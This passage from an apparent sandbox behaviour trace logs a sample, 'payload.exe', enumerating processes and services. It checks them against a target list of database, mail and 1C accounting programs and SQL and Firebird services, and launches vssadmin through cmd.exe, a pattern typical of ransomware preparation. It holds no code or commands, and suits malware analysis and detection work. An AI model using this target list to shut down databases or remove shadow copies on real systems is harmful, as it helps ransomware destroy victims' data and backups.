pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.514] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.514] lstrlenW (lpString="System") returned 6 [0264.514] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0264.514] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0264.514] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0264.515] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0264.515] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0264.515] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0264.515] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0264.515] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.515] lstrlenW (lpString="smss.exe") returned 8 [0264.515] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0264.515] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.515] lstrlenW (lpString="csrss.exe") returned 9 [0264.515] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.515] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.515] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.515] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.516] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.516] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.516] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.516] lstrlenW (lpString="wininit.exe") returned 11 [0264.516] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0264.516] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0264.516] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.516] lstrlenW (lpString="csrss.exe") returned 9 [0264.516] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.516] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.516] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.516] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.516] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.516] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.517] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.517] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.517] lstrlenW (lpString="winlogon.exe") returned 12 [0264.517] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0264.517] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0264.517] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.517] lstrlenW (lpString="services.exe") returned 12 [0264.517] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0264.517] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0264.518] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.518] lstrlenW (lpString="lsass.exe") returned 9 [0264.518] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0264.518] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0264.518] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0264.518] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0264.518] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0264.518] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0264.518] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0264.518] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0264.518] lstrlenW (lpString="lsm.exe") returned 7 [0264.518] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0264.518] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0264.518] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0264.518] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0264.518] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0264.518] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0264.518] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0264.519] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.519] lstrlenW (lpString="svchost.exe") returned 11 [0264.519] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.519] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.519] lstrlenW (lpString="svchost.exe") returned 11 [0264.519] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.519] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.520] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.520] lstrlenW (lpString="svchost.exe") returned 11 [0264.520] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.520] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.520] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.521] lstrlenW (lpString="svchost.exe") returned 11 [0264.521] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.521] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.521] lstrlenW (lpString="svchost.exe") returned 11 [0264.521] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.521] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.521] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.522] lstrlenW (lpString="audiodg.exe") returned 11 [0264.522] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0264.522] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0264.522] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0264.522] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0264.522] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0264.522] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0264.522] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0264.522] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.522] lstrlenW (lpString="svchost.exe") returned 11 [0264.522] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.522] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.522] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.522] lstrlenW (lpString="svchost.exe") returned 11 [0264.523] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.523] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.523] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0264.523] lstrlenW (lpString="userinit.exe") returned 12 [0264.523] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.523] lstrlenW (lpString="dwm.exe") returned 7 [0264.523] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.523] lstrlenW (lpString="explorer.exe") returned 12 [0264.523] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.524] lstrlenW (lpString="spoolsv.exe") returned 11 [0264.524] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0264.524] lstrlenW (lpString="taskhost.exe") returned 12 [0264.524] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.524] lstrlenW (lpString="svchost.exe") returned 11 [0264.524] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0264.524] lstrlenW (lpString="payload.exe") returned 11 [0264.524] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0264.525] lstrlenW (lpString="dllhost.exe") returned 11 [0264.525] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0264.525] lstrlenW (lpString="reader_sl.exe") returned 13 [0264.525] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0264.525] lstrlenW (lpString="cmd.exe") returned 7 [0264.525] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0264.525] lstrlenW (lpString="conhost.exe") returned 11 [0264.525] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0264.526] lstrlenW (lpString="vssadmin.exe") returned 12 [0264.526] Process32NextW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0264.526] CloseHandle (hObject=0x378) returned 1 [0264.526] Sleep (dwMilliseconds=0x1f4) [0265.134] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0265.267] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0265.267] GetLastError () returned 0xea [0265.267] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xacc) returned 0x43acc98 [0265.267] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x43acc98, cbBufSize=0xacc, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x43acc98, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0265.268] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0265.544] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0265.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.544] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0265.544] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0265.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0265.544] lstrlenW (lpString="AudioSrv") returned 8 [0265.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0265.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0265.544] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0265.544] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0265.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0265.544] lstrlenW (lpString="BFE") returned 3 [0265.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0265.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0265.545] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0265.545] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0265.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0265.545] lstrlenW (lpString="CscService") returned 10 [0265.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0265.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0265.545] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0265.545] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0265.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0265.545] lstrlenW (lpString="DcomLaunch") returned 10 [0265.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.545] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0265.545] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0265.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0265.545] lstrlenW (lpString="Dhcp") returned 4 [0265.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0265.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0265.545] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0265.545] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0265.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0265.545] lstrlenW (lpString="Dnscache") returned 8 [0265.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0265.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0265.545] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0265.545] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0265.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0265.546] lstrlenW (lpString="eventlog") returned 8 [0265.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0265.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0265.546] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0265.546] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0265.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0265.546] lstrlenW (lpString="EventSystem") returned 11 [0265.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0265.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0265.546] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0265.546] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0265.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0265.546] lstrlenW (lpString="gpsvc") returned 5 [0265.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0265.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0265.546] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0265.546] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0265.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0265.546] lstrlenW (lpString="LanmanWorkstation") returned 17 [0265.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0265.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0265.546] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0265.546] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0265.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0265.546] lstrlenW (lpString="lmhosts") returned 7 [0265.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0265.546] lstrcmpiW 